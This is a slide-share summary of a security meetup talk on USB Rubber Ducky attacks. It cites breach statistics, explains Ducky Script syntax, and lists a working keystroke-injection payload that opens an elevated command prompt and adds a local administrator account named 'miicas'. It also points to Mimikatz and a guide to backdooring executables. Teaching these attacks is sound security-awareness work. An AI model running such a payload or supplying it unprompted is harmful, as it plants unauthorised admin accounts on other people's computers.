Removable Disk Hacking for Fun and Profit
2 likes238 views
This document summarizes a meetup about IT audit and security topics. It discusses removable disk hacking using a programmable USB Rubber Ducky device. It provides examples of Ducky Script code to add a user and grant them administrator privileges on a Windows system. The document also references tools like Mimikatz and methods for deploying backdoored executables from a listening virtual private server using social engineering techniques.
Removable Disk Hacking for Fun and Profit
- 2. @rungga_reksya Incident Classification Patterns2015 Data Breach Investigations Report 2 831 Hacking – Use of stolen credentials 817 Hacking – Use of backdoor 817 Social - Phishing 812 Malware – Spyware / Key Logger 40%Web App Attack Top 10 Threat action varieties within Web App Attack breaches, (n=879)
- 6. Ducky Script 6 Ducky Script syntax is simple. Each command resides on a new line and may have options follow. Commands are written in ALL CAPS, because ducks are loud and like to quack with pride. Most commands invoke keystrokes, key-combos or strings of text, while some offer delays or pauses. Below is a list of commands and their function, followed by some example usage. Note: In the tables below //n// represents a number and //Char// represents characters A-Z, a-z. REM: Similar to the REM command in Basic and other languages, lines beginning with REM will not be processed. REM is a comment. DELAY: creates a momentary pause in the ducky script. It is quite handy for creating a moment of pause between sequential commands that may take the target computer some time to process. DELAY time is specified in milliseconds from 1 to 10000. STRING: processes the text following taking special care to auto-shift. STRING can accept a single or multiple characters. Ducky Script is the language of the USB Rubber Ducky. Writing scripts for can be done from any common ascii text editor such as Notepad, vi, emacs, nano, gedit, kedit, TextEdit, etc. Extended Commands: ENTER, BREAK, CAPSLOCK, DELETE, END, ESC, HOME, PRINTSCREEN, etc
- 7. Rubber Duck Scriptfor Fun and Profit 7 REM Add user dulu DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER ALT SPACE DELAY 1000 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING net user miicas password.123 /add ENTER STRING net localgroup administrators miicas /add ENTER My ScriptFake Putty https://www.offensive- security.com/metasploit- unleashed/backdooring-exe-files/ Mimikatz https://github.com/gentilkiwi /mimikatz Net User # net user miicas/add # net localgroup administrators miicas/add